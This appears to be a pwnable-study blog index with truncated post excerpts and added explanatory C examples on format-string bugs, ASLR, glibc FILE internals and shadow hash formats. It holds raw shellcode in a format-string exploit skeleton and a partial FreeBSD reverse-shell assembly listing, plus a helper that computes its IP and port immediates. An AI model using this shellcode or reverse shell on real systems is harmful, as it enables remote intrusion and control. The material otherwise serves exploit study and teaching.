
Research/Pwnable

NR advanced exploit lecture  (This post is protected.)
Finding environment variable on GDB  Finding environment variables in GDB. Plain gdb: 1: info variable environ --> x/dwx  2: x/s *((char**)environ), x/s *((char**)environ+1). PEDA: 1) searchmem SHELL
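The same walk over `environ` that the gdb commands above perform, as an added C example (not code from the original post): it resolves the address of an environment variable's value, which is what an exploit needs when the payload is parked in an environment variable. The variable name PWN_EXAMPLE and its payload string are constructed stand-ins. Keep in mind that addresses seen under gdb differ from a plain run because gdb adds variables such as LINES and COLUMNS and the program path on the stack differs; compare offsets rather than trusting an absolute address from the debugger.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;   /* the pointer the gdb commands above dereference */

/* Walk environ entry by entry, the way `x/s *((char**)environ)`,
 * `x/s *((char**)environ+1)`, ... does in gdb, and return the address of the
 * value part of NAME=value, or NULL if NAME is not set. */
const char *env_value_addr(const char *name)
{
    size_t len = strlen(name);
    for (char **ep = environ; ep != NULL && *ep != NULL; ep++) {
        if (strncmp(*ep, name, len) == 0 && (*ep)[len] == '=')
            return *ep + len + 1;
    }
    return NULL;
}

/* Self-check: set a variable standing in for one that carries a NOP sled plus
 * shellcode (constructed value), then confirm that walking environ lands on
 * exactly the address getenv() returns for it. */
int env_walk_matches_getenv(void)
{
    const char *payload = "NOPSLED-THEN-SHELLCODE";   /* constructed stand-in */
    if (setenv("PWN_EXAMPLE", payload, 1) != 0)
        return 0;
    const char *walked = env_value_addr("PWN_EXAMPLE");
    const char *looked_up = getenv("PWN_EXAMPLE");
    return walked != NULL && walked == looked_up && strcmp(walked, payload) == 0;
}

int main(void)
{
    /* Same picture as `x/s` over environ: one address per entry. */
    for (char **ep = environ; ep != NULL && *ep != NULL; ep++)
        printf("%p  %s\n", (void *)*ep, *ep);
    printf("SHELL value lives at %p\n", (void *)env_value_addr("SHELL"));
    return 0;
}
```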
Format String Bug python frame  Basic skeleton for an FSB exploit in Python:
    #!/usr/bin/python
    from socket import *
    from struct import *

    # shellcode and NOP sled
    nopsled = "\x90"
    sc = ""
    #sc += nopsled*0x10
    sc += "\x55\x89\xe5\x83\xec\x20\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x05\x6a\x79\x66\x68\x6b\x65\x89\xe3\xcd\x80\x89\xc3\xb0\x03\x8d\x4d\xe0\xb2\x21\xcd\x80\x89\xc2\xb0\x04\xb3\x04\xcd\x80\xc9\xc3"

    s = socket(AF_INET, SOCK_STREAM)
    s.connect(("localhost", 6665..
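The bug that skeleton targets, shown on the C side as an added example (not code from the original post): the vulnerable call beside its one-line fix, and the `%n` write primitive an FSB exploit is built from. The input "100%%" is constructed so that the two paths give visibly different results; the `%n` helper keeps the pointer as a legitimate vararg, where a real FSB reads it from a stack word the attacker filled with a target address.

```c
#include <stdio.h>
#include <string.h>

/* The compiler flags the vulnerable call below; keep it so the bug is visible. */
#pragma GCC diagnostic ignored "-Wformat-security"

/* The bug: attacker-controlled data becomes the format string. Every %x leaks
 * a stack word, %s reads through a stack word, %n writes through one. */
int fmt_vulnerable(char *out, size_t n, const char *user)
{
    return snprintf(out, n, user);
}

/* The fix: the format is a constant and user data is only an argument. */
int fmt_hardened(char *out, size_t n, const char *user)
{
    return snprintf(out, n, "%s", user);
}

/* The write primitive: %n stores the number of bytes emitted so far through a
 * pointer argument, and the width of an earlier conversion chooses that
 * number. value must be in 1..127 for the scratch buffer used here. */
unsigned int fsb_write_value(unsigned int value)
{
    unsigned int target = 0;
    char fmt[32], scratch[128];
    snprintf(fmt, sizeof fmt, "%%%uc%%n", value);   /* e.g. "%8c%n" */
    snprintf(scratch, sizeof scratch, fmt, 'A', &target);
    return target;
}

/* Constructed input that behaves differently in the two paths: "%%" is an
 * escape when interpreted as a format, but plain data when passed via %s. */
int fsb_demo_check(void)
{
    char v[32], h[32];
    fmt_vulnerable(v, sizeof v, "100%%");
    fmt_hardened(h, sizeof h, "100%%");
    return strcmp(v, "100%") == 0 && strcmp(h, "100%%") == 0;
}

int main(void)
{
    printf("vulnerable vs hardened differ: %d\n", fsb_demo_check());
    printf("%%n wrote %u\n", fsb_write_value(8));
    return 0;
}
```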
Protection mechanisms (notes in progress)  http://docs.oracle.com/cd/E37670_01/E36387/html/ol_kernel_sec.html  ASLR: /proc/sys/kernel/randomize_va_space  0: off  1: Stack, Virtual Dynamic Shared Object, Shared Mem (stack, libraries)  2: Stack, Virtual Dynamic Shared Object, Shared memory, Data segment (stack, libraries, heap).  Set kernel.randomize_va_space = VALUE in /etc/sysctl.conf and run sysctl -p to apply it permanently. To turn ASLR off for a single program: setarch `uname -m` -R prog..
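What those two switches look like from inside a process, as an added C example (not from the original post): it reads the system-wide randomize_va_space value and queries or sets the ADDR_NO_RANDOMIZE personality flag, which is what `setarch -R` sets before exec'ing the target. Assumptions: Linux with /proc mounted; sandboxes that filter the personality syscall may refuse to set the flag, which the code reports rather than hides.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/personality.h>

/* System-wide setting: 0, 1 or 2, or -1 if /proc is unavailable. */
int read_randomize_va_space(void)
{
    FILE *fp = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (fp == NULL)
        return -1;
    int v = -1;
    if (fscanf(fp, "%d", &v) != 1)
        v = -1;
    fclose(fp);
    return v;
}

const char *describe_randomize_va_space(int v)
{
    switch (v) {
    case 0:  return "off";
    case 1:  return "stack, VDSO, shared memory randomized";
    case 2:  return "stack, VDSO, shared memory and brk heap randomized";
    default: return "unknown / not readable";
    }
}

/* Per-process switch: the ADDR_NO_RANDOMIZE persona flag, inherited across
 * exec. Returns 1 if set, 0 if not, -1 if the query itself is refused.
 * personality(0xffffffff) is the documented way to query without changing. */
int aslr_disabled_for_this_process(void)
{
    int p = personality(0xffffffff);
    if (p == -1)
        return -1;
    return (p & ADDR_NO_RANDOMIZE) ? 1 : 0;
}

/* What `setarch $(uname -m) -R prog` does before exec. Returns 1 on success,
 * 0 if the kernel or a seccomp filter refused it. */
int disable_aslr_for_this_process(void)
{
    int p = personality(0xffffffff);
    if (p == -1)
        return 0;
    return personality(p | ADDR_NO_RANDOMIZE) != -1;
}

int main(void)
{
    int v = read_randomize_va_space();
    printf("randomize_va_space = %d (%s)\n", v, describe_randomize_va_space(v));
    printf("ADDR_NO_RANDOMIZE set: %d\n", aslr_disabled_for_this_process());
    int local;
    char *heap = malloc(16);
    /* Run twice: with ASLR on these move, with it off they stay put. */
    printf("stack %p  heap %p\n", (void *)&local, (void *)heap);
    free(heap);
    return 0;
}
```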
linux FILE struct  FILE: fp->_IO_read_ptr, fp->_IO_read_end, fp->_IO_read_base, fp->_IO_write_base, fp->_IO_write_ptr, fp->_IO_write_end, fp->_IO_buf_base, fp->_IO_buf_end, fp->_IO_save_base, fp->_IO_backup_base, fp->_IO_save_end, fp->_fileno
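How those fields move during a read, as an added C example (not from the original post): a constructed sample string is written to a temp file, the stream is rewound, five bytes are consumed with fgetc(), and the read and buffer pointers are checked against what that should have done. It assumes glibc, whose FILE exposes these members; on other libcs the check is skipped.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

#ifdef __GLIBC__
/* Consume n bytes with fgetc() and report how far _IO_read_ptr has moved past
 * _IO_read_base, i.e. how many buffered bytes the stream has handed out. */
long consumed_from_buffer(FILE *fp, int n)
{
    for (int i = 0; i < n; i++)
        if (fgetc(fp) == EOF)
            return -1;
    return (long)(fp->_IO_read_ptr - fp->_IO_read_base);
}

/* Constructed sample: write a short string, rewind, read five bytes, then
 * check the read pointers and the buffer bounds. */
int file_struct_demo(void)
{
    static const char data[] = "CONSTRUCTED SAMPLE DATA FOR THE FILE STRUCT EXAMPLE";
    const long len = (long)(sizeof data - 1);
    FILE *fp = tmpfile();
    if (fp == NULL)
        return 0;
    if (fwrite(data, 1, (size_t)len, fp) != (size_t)len) { fclose(fp); return 0; }
    rewind(fp);                                   /* first fgetc refills the buffer */
    int ok = consumed_from_buffer(fp, 5) == 5
          && fp->_IO_read_end - fp->_IO_read_base == len   /* whole file is buffered */
          && fp->_IO_read_base == fp->_IO_buf_base         /* read area starts at the buffer */
          && fp->_IO_buf_end - fp->_IO_buf_base >= len     /* buffer big enough for it */
          && fp->_fileno >= 0;
    fclose(fp);
    return ok;
}

/* Offsets an exploit needs when it forges or overwrites a FILE. */
void print_file_offsets(void)
{
    printf("_IO_read_ptr   %zu\n", offsetof(FILE, _IO_read_ptr));
    printf("_IO_read_end   %zu\n", offsetof(FILE, _IO_read_end));
    printf("_IO_read_base  %zu\n", offsetof(FILE, _IO_read_base));
    printf("_IO_write_base %zu\n", offsetof(FILE, _IO_write_base));
    printf("_IO_write_ptr  %zu\n", offsetof(FILE, _IO_write_ptr));
    printf("_IO_write_end  %zu\n", offsetof(FILE, _IO_write_end));
    printf("_IO_buf_base   %zu\n", offsetof(FILE, _IO_buf_base));
    printf("_IO_buf_end    %zu\n", offsetof(FILE, _IO_buf_end));
    printf("_fileno        %zu\n", offsetof(FILE, _fileno));
}
#else
int file_struct_demo(void) { return 1; }   /* not glibc: nothing to inspect */
void print_file_offsets(void) { puts("not glibc"); }
#endif

int main(void)
{
    print_file_offsets();
    printf("pointer check: %d\n", file_struct_demo());
    return 0;
}
```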
SHA 512, /etc/shadow decrypt  $6$  NOTES  Glibc notes: The glibc2 version of this function supports additional encryption algorithms. If salt is a character string starting with the characters "$id$" followed by a string terminated by "$": $id$salt$encrypted then instead of using the DES machine, id identifies the encryption method used and this then determines how the rest of the password string is interpreted. The following..
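A parser for that `$id$salt$encrypted` layout, as an added C example (not from the man page or the original post): it splits a shadow-style hash into id, optional rounds=, salt and hash, names the algorithm for ids 1, 5 and 6, and checks that the hash part has the length that algorithm produces (22, 43 and 86 base64 characters respectively). The sample hashes are constructed strings of the right shape, not real shadow entries.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct crypt_fields {
    char id[8];
    unsigned long rounds;   /* 5000 unless a rounds= field is present */
    char salt[32];
    char hash[128];
};

/* Parse "$id$[rounds=N$]salt$hash". Returns 1 on success, 0 on malformed input. */
int parse_crypt(const char *s, struct crypt_fields *f)
{
    memset(f, 0, sizeof *f);
    f->rounds = 5000;
    if (s == NULL || s[0] != '$')
        return 0;
    const char *p = s + 1, *q = strchr(p, '$');
    if (q == NULL || q == p || (size_t)(q - p) >= sizeof f->id)
        return 0;
    memcpy(f->id, p, (size_t)(q - p));
    p = q + 1;
    if (strncmp(p, "rounds=", 7) == 0) {
        char *end;
        f->rounds = strtoul(p + 7, &end, 10);
        if (end == p + 7 || *end != '$')
            return 0;
        p = end + 1;
    }
    q = strchr(p, '$');
    if (q == NULL || (size_t)(q - p) >= sizeof f->salt)
        return 0;
    memcpy(f->salt, p, (size_t)(q - p));
    p = q + 1;
    if (*p == '\0' || strlen(p) >= sizeof f->hash || strchr(p, '$') != NULL)
        return 0;
    strcpy(f->hash, p);
    return 1;
}

const char *crypt_id_name(const char *id)
{
    if (strcmp(id, "1") == 0) return "MD5";
    if (strcmp(id, "5") == 0) return "SHA-256";
    if (strcmp(id, "6") == 0) return "SHA-512";
    return "unknown";
}

/* Length of the encoded digest each method emits. */
int crypt_hash_len_ok(const struct crypt_fields *f)
{
    size_t n = strlen(f->hash);
    if (strcmp(f->id, "1") == 0) return n == 22;
    if (strcmp(f->id, "5") == 0) return n == 43;
    if (strcmp(f->id, "6") == 0) return n == 86;
    return 0;
}

/* Constructed samples: correct shape, not real password hashes. */
#define SAMPLE_HASH86 "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789./abcdefghijklmnopqrstuv"
#define SAMPLE_HASH22 "abcdefghijklmnopqrstuv"
static const char sample_sha512[] = "$6$rounds=10000$saltsalt$" SAMPLE_HASH86;
static const char sample_sha512_default[] = "$6$saltsalt$" SAMPLE_HASH86;
static const char sample_md5[] = "$1$abc$" SAMPLE_HASH22;

int main(void)
{
    struct crypt_fields f;
    if (parse_crypt(sample_sha512, &f))
        printf("id=%s (%s) rounds=%lu salt=%s hash-len-ok=%d\n",
               f.id, crypt_id_name(f.id), f.rounds, f.salt, crypt_hash_len_ok(&f));
    return 0;
}
```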
When a PID does not show up under the proc directory on FreeBSD:  # mount -t procfs proc /proc  # mount  Open /etc/fstab, the file system table: # vi /etc/fstab  Append the following line so that procfs is mounted automatically at boot: proc /proc procfs rw 0 0  http://www.cyberciti.biz/faq/howto-freebsd-mount-procfs/
[shellcode] FreeBSD x86 Reverse Read shell
    .globl main
    main:
        push %ebp
        mov %esp, %ebp
        sub $0x20, %esp
        xor %eax, %eax
        xor %ebx, %ebx
        xor %ecx, %ecx
        xor %edx, %edx
        push %ecx
        inc %ecx
        push %ecx
        inc %ecx
        push %ecx
        mov $0x61, %al
        push %eax
        int $0x80
        mov %eax, %esi
        # sockaddr_in
        push $0xGHEFCDAB   # IP, little-endian
        pushw $0x3412      # port, little-endian
        pushw $0x02AA
        mov %esp, %ebx
        # connect
        mov $0x10, %cl
        push %ecx
        push %ebx
        push %eax
        mov $0x62, %al
        push %..
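Filling in the two placeholders above (the IP dword and the port word) is where reverse-connect shellcode usually goes wrong, so here is an added C helper (not from the original post) that computes the immediates and then rebuilds the 8-byte stack image the three pushes leave behind, decoding it as a FreeBSD sockaddr_in (sin_len, sin_family, sin_port, sin_addr) to confirm the address and port round-trip. The port immediate 0x3412 from the listing corresponds to port 0x1234; the 0x02AA word lands as sin_len = 0xAA and sin_family = 2 (AF_INET), and FreeBSD's connect() overwrites sin_len from the length argument (the 0x10 in %ecx), so that byte is harmless. The addresses and ports used are constructed test values.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>

/* Dotted IP -> 32-bit immediate for `push $0x...`. The x86 push stores the
 * immediate little-endian, and sin_addr must end up in network (big-endian)
 * order, so the octets are reversed into the immediate. */
int ip_push_imm(const char *dotted, uint32_t *imm)
{
    unsigned o[4];
    if (sscanf(dotted, "%u.%u.%u.%u", &o[0], &o[1], &o[2], &o[3]) != 4)
        return 0;
    for (int i = 0; i < 4; i++)
        if (o[i] > 255)
            return 0;
    *imm = (o[3] << 24) | (o[2] << 16) | (o[1] << 8) | o[0];
    return 1;
}

/* Port -> 16-bit immediate for `pushw $0x...` (byte-swapped for the same reason). */
uint16_t port_push_imm(uint16_t port)
{
    return (uint16_t)(((port & 0xff) << 8) | (port >> 8));
}

/* Rebuild what the three pushes leave on the stack (the last push ends at the
 * lowest address) and decode it as a FreeBSD sockaddr_in:
 *   offset 0 sin_len, 1 sin_family, 2-3 sin_port, 4-7 sin_addr.
 * Returns 1 if the decoded family, port and address match the request. */
int stack_image_roundtrip(const char *dotted, uint16_t port)
{
    uint32_t ipimm;
    if (!ip_push_imm(dotted, &ipimm))
        return 0;
    uint16_t pimm = port_push_imm(port), fam = 0x02AA;
    uint8_t stack[8];
    /* emulate the little-endian stores without depending on host byte order */
    stack[0] = fam & 0xff;  stack[1] = fam >> 8;      /* pushw $0x02AA */
    stack[2] = pimm & 0xff; stack[3] = pimm >> 8;     /* pushw $port   */
    for (int i = 0; i < 4; i++)                       /* push  $ip     */
        stack[4 + i] = (ipimm >> (8 * i)) & 0xff;

    uint16_t port_net;
    struct in_addr a;
    char buf[INET_ADDRSTRLEN];
    memcpy(&port_net, stack + 2, 2);
    memcpy(&a, stack + 4, 4);
    return stack[1] == 2 /* AF_INET */
        && ntohs(port_net) == port
        && inet_ntop(AF_INET, &a, buf, sizeof buf) != NULL
        && strcmp(buf, dotted) == 0;
}

int main(void)
{
    uint32_t ipimm;
    const char *ip = "192.168.0.1";   /* constructed example target */
    uint16_t port = 4444;
    if (ip_push_imm(ip, &ipimm)) {
        printf("push  $0x%08x   # %s\n", ipimm, ip);
        printf("pushw $0x%04x       # port %u\n", port_push_imm(port), port);
        printf("round-trip ok: %d\n", stack_image_roundtrip(ip, port));
    }
    return 0;
}
```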